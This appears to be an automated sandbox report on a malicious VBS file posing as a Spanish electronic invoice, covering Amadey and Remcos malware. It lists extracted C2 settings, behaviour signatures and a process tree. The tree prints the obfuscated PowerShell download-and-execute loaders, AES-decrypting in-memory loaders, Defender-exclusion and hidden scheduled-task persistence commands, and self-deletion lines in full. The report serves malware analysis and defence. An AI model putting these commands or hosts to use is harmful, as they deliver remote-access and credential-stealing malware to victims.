amadey | 11bf9cfeb7d20f677bcb2e142d60f4ab3448939885bbc13560dd790458db6c14

Analysis

max time kernel
210s
max time network
214s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
10/07/2023, 13:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

factura_electronica40368715.vbs
Size

217KB
MD5

40c13f298b6192104a86390f94cc07b7
SHA1

c833b88d80db64cc42bc3677f6b6b60277df29e9
SHA256

11bf9cfeb7d20f677bcb2e142d60f4ab3448939885bbc13560dd790458db6c14
SHA512

d94d5224a824e4e96b8bf070b59be91802cc171b5df06bf7a14633480dc123eb12b5c969db9a94cf99a85aeac4043549f7713f3fb37f2f720d37f1117f6ee1cd
SSDEEP

3072:i5d6525555555e555555555555p5555/555ty:o

Score

10^/10

amadey remcos julio 05 scrubcrypt persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/dstpKjTz

Extracted

Family

amadey

Version

3.85

213.226.123.14/8bmeVwqx/index.php

Extracted

Family

remcos

Botnet

JULIO 05 ScrubCrypt

autgerman.autgerman.com:2203

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
Acobatlg.exe
copy_folder
edqelofh
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
sintrbgh
mouse_option
false
mutex
ractofamin-MS1XZ3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4956	powershell.exe
4	4956	powershell.exe
8	4956	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
3424	onLyofFicED.cmd.exe
4960	pSqHUpAnHr.cmd.exe
4532	plrfcluk.2w2.exe

Loads dropped DLL 3 IoCs

pid	Process
2596	rundll32.exe
5076	rundll32.exe
4192	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000\Software\Microsoft\Windows\CurrentVersion\Run\eyUWM = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4956 set thread context of 4588	4956	powershell.exe	76

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2044	5076	WerFault.exe	106

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000_Classes\Local Settings	onLyofFicED.cmd.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
96	powershell.exe
96	powershell.exe
96	powershell.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe
5048	powershell.exe
4856	powershell.exe
4856	powershell.exe
5048	powershell.exe
980	powershell.exe
5048	powershell.exe
4856	powershell.exe
980	powershell.exe
980	powershell.exe
5048	powershell.exe
2208	powershell.exe
2208	powershell.exe
2208	powershell.exe
3424	onLyofFicED.cmd.exe
3424	onLyofFicED.cmd.exe
3424	onLyofFicED.cmd.exe
4852	powershell.exe
5116	powershell.exe
5116	powershell.exe
4852	powershell.exe
5116	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
4960	pSqHUpAnHr.cmd.exe
4960	pSqHUpAnHr.cmd.exe
4960	pSqHUpAnHr.cmd.exe
2472	powershell.exe
2692	powershell.exe
2472	powershell.exe
2692	powershell.exe
2472	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
3648	powershell.exe
3648	powershell.exe
3648	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4532	plrfcluk.2w2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	96	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	3424	onLyofFicED.cmd.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeIncreaseQuotaPrivilege	2572	powershell.exe
Token: SeSecurityPrivilege	2572	powershell.exe
Token: SeTakeOwnershipPrivilege	2572	powershell.exe
Token: SeLoadDriverPrivilege	2572	powershell.exe
Token: SeSystemProfilePrivilege	2572	powershell.exe
Token: SeSystemtimePrivilege	2572	powershell.exe
Token: SeProfSingleProcessPrivilege	2572	powershell.exe
Token: SeIncBasePriorityPrivilege	2572	powershell.exe
Token: SeCreatePagefilePrivilege	2572	powershell.exe
Token: SeBackupPrivilege	2572	powershell.exe
Token: SeRestorePrivilege	2572	powershell.exe
Token: SeShutdownPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeSystemEnvironmentPrivilege	2572	powershell.exe
Token: SeRemoteShutdownPrivilege	2572	powershell.exe
Token: SeUndockPrivilege	2572	powershell.exe
Token: SeManageVolumePrivilege	2572	powershell.exe
Token: 33	2572	powershell.exe
Token: 34	2572	powershell.exe
Token: 35	2572	powershell.exe
Token: 36	2572	powershell.exe
Token: SeIncreaseQuotaPrivilege	2572	powershell.exe
Token: SeSecurityPrivilege	2572	powershell.exe
Token: SeTakeOwnershipPrivilege	2572	powershell.exe
Token: SeLoadDriverPrivilege	2572	powershell.exe
Token: SeSystemProfilePrivilege	2572	powershell.exe
Token: SeSystemtimePrivilege	2572	powershell.exe
Token: SeProfSingleProcessPrivilege	2572	powershell.exe
Token: SeIncBasePriorityPrivilege	2572	powershell.exe
Token: SeCreatePagefilePrivilege	2572	powershell.exe
Token: SeBackupPrivilege	2572	powershell.exe
Token: SeRestorePrivilege	2572	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4532	plrfcluk.2w2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4924 wrote to memory of 96	4924	WScript.exe	70
PID 4924 wrote to memory of 96	4924	WScript.exe	70
PID 96 wrote to memory of 4956	96	powershell.exe	72
PID 96 wrote to memory of 4956	96	powershell.exe	72
PID 4956 wrote to memory of 5048	4956	powershell.exe	73
PID 4956 wrote to memory of 5048	4956	powershell.exe	73
PID 4956 wrote to memory of 4856	4956	powershell.exe	74
PID 4956 wrote to memory of 4856	4956	powershell.exe	74
PID 4956 wrote to memory of 980	4956	powershell.exe	75
PID 4956 wrote to memory of 980	4956	powershell.exe	75
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 4956 wrote to memory of 4588	4956	powershell.exe	76
PID 5048 wrote to memory of 2208	5048	powershell.exe	77
PID 5048 wrote to memory of 2208	5048	powershell.exe	77
PID 4588 wrote to memory of 2896	4588	InstallUtil.exe	78
PID 4588 wrote to memory of 2896	4588	InstallUtil.exe	78
PID 4588 wrote to memory of 2896	4588	InstallUtil.exe	78
PID 2896 wrote to memory of 1916	2896	cmd.exe	80
PID 2896 wrote to memory of 1916	2896	cmd.exe	80
PID 2896 wrote to memory of 1916	2896	cmd.exe	80
PID 1916 wrote to memory of 3424	1916	cmd.exe	82
PID 1916 wrote to memory of 3424	1916	cmd.exe	82
PID 1916 wrote to memory of 3424	1916	cmd.exe	82
PID 3424 wrote to memory of 4852	3424	onLyofFicED.cmd.exe	84
PID 3424 wrote to memory of 4852	3424	onLyofFicED.cmd.exe	84
PID 3424 wrote to memory of 4852	3424	onLyofFicED.cmd.exe	84
PID 3424 wrote to memory of 5116	3424	onLyofFicED.cmd.exe	86
PID 3424 wrote to memory of 5116	3424	onLyofFicED.cmd.exe	86
PID 3424 wrote to memory of 5116	3424	onLyofFicED.cmd.exe	86
PID 3424 wrote to memory of 1296	3424	onLyofFicED.cmd.exe	88
PID 3424 wrote to memory of 1296	3424	onLyofFicED.cmd.exe	88
PID 3424 wrote to memory of 1296	3424	onLyofFicED.cmd.exe	88
PID 3424 wrote to memory of 2572	3424	onLyofFicED.cmd.exe	90
PID 3424 wrote to memory of 2572	3424	onLyofFicED.cmd.exe	90
PID 3424 wrote to memory of 2572	3424	onLyofFicED.cmd.exe	90
PID 3424 wrote to memory of 2896	3424	onLyofFicED.cmd.exe	92
PID 3424 wrote to memory of 2896	3424	onLyofFicED.cmd.exe	92
PID 3424 wrote to memory of 2896	3424	onLyofFicED.cmd.exe	92
PID 2896 wrote to memory of 3884	2896	WScript.exe	93
PID 2896 wrote to memory of 3884	2896	WScript.exe	93
PID 2896 wrote to memory of 3884	2896	WScript.exe	93
PID 3884 wrote to memory of 4960	3884	cmd.exe	96
PID 3884 wrote to memory of 4960	3884	cmd.exe	96
PID 3884 wrote to memory of 4960	3884	cmd.exe	96
PID 4960 wrote to memory of 2692	4960	pSqHUpAnHr.cmd.exe	97
PID 4960 wrote to memory of 2692	4960	pSqHUpAnHr.cmd.exe	97
PID 4960 wrote to memory of 2692	4960	pSqHUpAnHr.cmd.exe	97
PID 4960 wrote to memory of 2472	4960	pSqHUpAnHr.cmd.exe	99
PID 4960 wrote to memory of 2472	4960	pSqHUpAnHr.cmd.exe	99
PID 4960 wrote to memory of 2472	4960	pSqHUpAnHr.cmd.exe	99
PID 4960 wrote to memory of 3648	4960	pSqHUpAnHr.cmd.exe	101
PID 4960 wrote to memory of 3648	4960	pSqHUpAnHr.cmd.exe	101
PID 4960 wrote to memory of 3648	4960	pSqHUpAnHr.cmd.exe	101
PID 4960 wrote to memory of 4532	4960	pSqHUpAnHr.cmd.exe	102
PID 4960 wrote to memory of 4532	4960	pSqHUpAnHr.cmd.exe	102
PID 4960 wrote to memory of 4532	4960	pSqHUpAnHr.cmd.exe	102

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\factura_electronica40368715.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱Bw‱Gk‱a‱Bl‱HI‱I‱‱9‱C‱‱Jw‱w‱DE‱Mw‱n‱Ds‱J‱Bx‱G4‱dQBq‱HM‱I‱‱9‱C‱‱Jw‱l‱H‱‱egBB‱GM‱TwBn‱Ek‱bgBN‱HI‱JQ‱n‱Ds‱WwBC‱Hk‱d‱Bl‱Fs‱XQBd‱C‱‱J‱Bi‱GM‱agB5‱Gs‱I‱‱9‱C‱‱WwBz‱Hk‱cwB0‱GU‱bQ‱u‱EM‱bwBu‱HY‱ZQBy‱HQ‱XQ‱6‱Do‱RgBy‱G8‱bQBC‱GE‱cwBl‱DY‱N‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱I‱‱o‱E4‱ZQB3‱C0‱TwBi‱Go‱ZQBj‱HQ‱I‱BO‱GU‱d‱‱u‱Fc‱ZQBi‱EM‱b‱Bp‱GU‱bgB0‱Ck‱LgBE‱G8‱dwBu‱Gw‱bwBh‱GQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱n‱Gg‱d‱B0‱H‱‱cw‱6‱C8‱LwBw‱GE‱cwB0‱GU‱YgBp‱G4‱LgBj‱G8‱bQ‱v‱HI‱YQB3‱C8‱Z‱Bz‱HQ‱c‱BL‱Go‱V‱B6‱Cc‱KQ‱g‱Ck‱I‱‱p‱Ds‱WwBz‱Hk‱cwB0‱GU‱bQ‱u‱EE‱c‱Bw‱EQ‱bwBt‱GE‱aQBu‱F0‱Og‱6‱EM‱dQBy‱HI‱ZQBu‱HQ‱R‱Bv‱G0‱YQBp‱G4‱LgBM‱G8‱YQBk‱Cg‱J‱Bi‱GM‱agB5‱Gs‱KQ‱u‱Ec‱ZQB0‱FQ‱eQBw‱GU‱K‱‱n‱EM‱Z‱BX‱EQ‱Z‱BC‱C4‱R‱BL‱GU‱UwB2‱Gw‱Jw‱p‱C4‱RwBl‱HQ‱TQBl‱HQ‱a‱Bv‱GQ‱K‱‱n‱E4‱bgBJ‱GE‱VQBx‱Cc‱KQ‱u‱Ek‱bgB2‱G8‱awBl‱Cg‱J‱Bu‱HU‱b‱Bs‱Cw‱I‱Bb‱G8‱YgBq‱GU‱YwB0‱Fs‱XQBd‱C‱‱K‱‱n‱HQ‱e‱B0‱C4‱eQBl‱GQ‱YQBt‱GE‱LwBt‱G8‱Yw‱u‱HQ‱YwBh‱GY‱cgBp‱GI‱dQBz‱C8‱Lw‱6‱HM‱c‱B0‱HQ‱a‱‱n‱C‱‱L‱‱g‱CQ‱cQBu‱HU‱agBz‱C‱‱L‱‱g‱Cc‱ZQB5‱FU‱VwBN‱Cc‱L‱‱g‱CQ‱c‱Bp‱Gg‱ZQBy‱Cw‱I‱‱n‱DE‱Jw‱s‱C‱‱JwBS‱G8‱Z‱Bh‱Cc‱I‱‱p‱Ck‱Ow‱=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\factura_electronica40368715.vbs');powershell -command $KByHL;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:96
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$piher = '013';$qnujs = 'C:\Users\Admin\AppData\Local\Temp\factura_electronica40368715.vbs';[Byte[]] $bcjyk = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/dstpKjTz') ) );[system.AppDomain]::CurrentDomain.Load($bcjyk).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('txt.yedama/moc.tcafribus//:sptth' , $qnujs , 'eyUWM', $piher, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\factura_electronica40368715.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\factura_electronica40368715.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:980
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4588
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000150021\onLyofFicED.cmd" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2896
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000150021\onLyofFicED.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\1000150021\onLyofFicED.cmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000150021\onLyofFicED.cmd.exe" -w hidden -c $iTdX='ElemvTRXenvTRXtAvTRXtvTRX'.Replace('vTRX', '');$xZRe='TravTRXnsvTRXforvTRXmvTRXFinvTRXavTRXlBvTRXlvTRXovTRXckvTRX'.Replace('vTRX', '');$Ncii='ChavTRXngvTRXeEvTRXxvTRXtenvTRXsionvTRX'.Replace('vTRX', '');$KOnt='SvTRXplvTRXitvTRX'.Replace('vTRX', '');$QVke='LovTRXavTRXdvTRX'.Replace('vTRX', '');$SOKi='FrvTRXovTRXmBasvTRXevTRX6vTRX4StvTRXrinvTRXgvTRX'.Replace('vTRX', '');$Jedu='EnvTRXtrvTRXyPovTRXintvTRX'.Replace('vTRX', '');$nWfQ='GevTRXtvTRXCuvTRXrrvTRXentvTRXProvTRXcesvTRXsvTRX'.Replace('vTRX', '');$OKqq='InvTRXvokevTRX'.Replace('vTRX', '');$gwzM='MavTRXinMvTRXodulvTRXevTRX'.Replace('vTRX', '');$MSHx='CrevTRXavTRXtvTRXeDvTRXecvTRXrypvTRXtvTRXorvTRX'.Replace('vTRX', '');$vSJs='RevTRXadvTRXLivTRXnevTRXsvTRX'.Replace('vTRX', '');function UVEtL($VZqQp){$zjsDo=[System.Security.Cryptography.Aes]::Create();$zjsDo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zjsDo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zjsDo.Key=[System.Convert]::$SOKi('PJFIwovHCeAbQYsN8b+RxBe4t3rs086i1g/w+F56UyY=');$zjsDo.IV=[System.Convert]::$SOKi('mBk9i/XZmBHbSStWfHL0dQ==');$AtBTi=$zjsDo.$MSHx();$DVyzv=$AtBTi.$xZRe($VZqQp,0,$VZqQp.Length);$AtBTi.Dispose();$zjsDo.Dispose();$DVyzv;}function bvTXS($VZqQp){$gXtCe=New-Object System.IO.MemoryStream(,$VZqQp);$DdZiS=New-Object System.IO.MemoryStream;$aPxmB=New-Object System.IO.Compression.GZipStream($gXtCe,[IO.Compression.CompressionMode]::Decompress);$aPxmB.CopyTo($DdZiS);$aPxmB.Dispose();$gXtCe.Dispose();$DdZiS.Dispose();$DdZiS.ToArray();}$NRoor=[System.Linq.Enumerable]::$iTdX([System.IO.File]::$vSJs([System.IO.Path]::$Ncii([System.Diagnostics.Process]::$nWfQ().$gwzM.FileName, $null)), 1);$TVkTD=$NRoor.Substring(2).$KOnt(':');$NQxao=bvTXS (UVEtL ([Convert]::$SOKi($TVkTD[0])));$aPcuA=bvTXS (UVEtL ([Convert]::$SOKi($TVkTD[1])));[System.Reflection.Assembly]::$QVke([byte[]]$aPcuA).$Jedu.$OKqq($null,$null);[System.Reflection.Assembly]::$QVke([byte[]]$NQxao).$Jedu.$OKqq($null,$null);
        7⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3424);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1000150021\onLyofFicED')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive pSqHUpAnHr' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\pSqHUpAnHr.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\pSqHUpAnHr.vbs"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\pSqHUpAnHr.cmd" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:3884
        
        C:\Users\Admin\AppData\Roaming\pSqHUpAnHr.cmd.exe
        
        "C:\Users\Admin\AppData\Roaming\pSqHUpAnHr.cmd.exe" -w hidden -c $iTdX='ElemvTRXenvTRXtAvTRXtvTRX'.Replace('vTRX', '');$xZRe='TravTRXnsvTRXforvTRXmvTRXFinvTRXavTRXlBvTRXlvTRXovTRXckvTRX'.Replace('vTRX', '');$Ncii='ChavTRXngvTRXeEvTRXxvTRXtenvTRXsionvTRX'.Replace('vTRX', '');$KOnt='SvTRXplvTRXitvTRX'.Replace('vTRX', '');$QVke='LovTRXavTRXdvTRX'.Replace('vTRX', '');$SOKi='FrvTRXovTRXmBasvTRXevTRX6vTRX4StvTRXrinvTRXgvTRX'.Replace('vTRX', '');$Jedu='EnvTRXtrvTRXyPovTRXintvTRX'.Replace('vTRX', '');$nWfQ='GevTRXtvTRXCuvTRXrrvTRXentvTRXProvTRXcesvTRXsvTRX'.Replace('vTRX', '');$OKqq='InvTRXvokevTRX'.Replace('vTRX', '');$gwzM='MavTRXinMvTRXodulvTRXevTRX'.Replace('vTRX', '');$MSHx='CrevTRXavTRXtvTRXeDvTRXecvTRXrypvTRXtvTRXorvTRX'.Replace('vTRX', '');$vSJs='RevTRXadvTRXLivTRXnevTRXsvTRX'.Replace('vTRX', '');function UVEtL($VZqQp){$zjsDo=[System.Security.Cryptography.Aes]::Create();$zjsDo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zjsDo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zjsDo.Key=[System.Convert]::$SOKi('PJFIwovHCeAbQYsN8b+RxBe4t3rs086i1g/w+F56UyY=');$zjsDo.IV=[System.Convert]::$SOKi('mBk9i/XZmBHbSStWfHL0dQ==');$AtBTi=$zjsDo.$MSHx();$DVyzv=$AtBTi.$xZRe($VZqQp,0,$VZqQp.Length);$AtBTi.Dispose();$zjsDo.Dispose();$DVyzv;}function bvTXS($VZqQp){$gXtCe=New-Object System.IO.MemoryStream(,$VZqQp);$DdZiS=New-Object System.IO.MemoryStream;$aPxmB=New-Object System.IO.Compression.GZipStream($gXtCe,[IO.Compression.CompressionMode]::Decompress);$aPxmB.CopyTo($DdZiS);$aPxmB.Dispose();$gXtCe.Dispose();$DdZiS.Dispose();$DdZiS.ToArray();}$NRoor=[System.Linq.Enumerable]::$iTdX([System.IO.File]::$vSJs([System.IO.Path]::$Ncii([System.Diagnostics.Process]::$nWfQ().$gwzM.FileName, $null)), 1);$TVkTD=$NRoor.Substring(2).$KOnt(':');$NQxao=bvTXS (UVEtL ([Convert]::$SOKi($TVkTD[0])));$aPcuA=bvTXS (UVEtL ([Convert]::$SOKi($TVkTD[1])));[System.Reflection.Assembly]::$QVke([byte[]]$aPcuA).$Jedu.$OKqq($null,$null);[System.Reflection.Assembly]::$QVke([byte[]]$NQxao).$Jedu.$OKqq($null,$null);
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4960);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\pSqHUpAnHr')
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\plrfcluk.2w2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\plrfcluk.2w2.exe"
        11⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:4532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4532);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4140
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b47fe11f8b12c7\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:2596
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b47fe11f8b12c7\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:5076
        
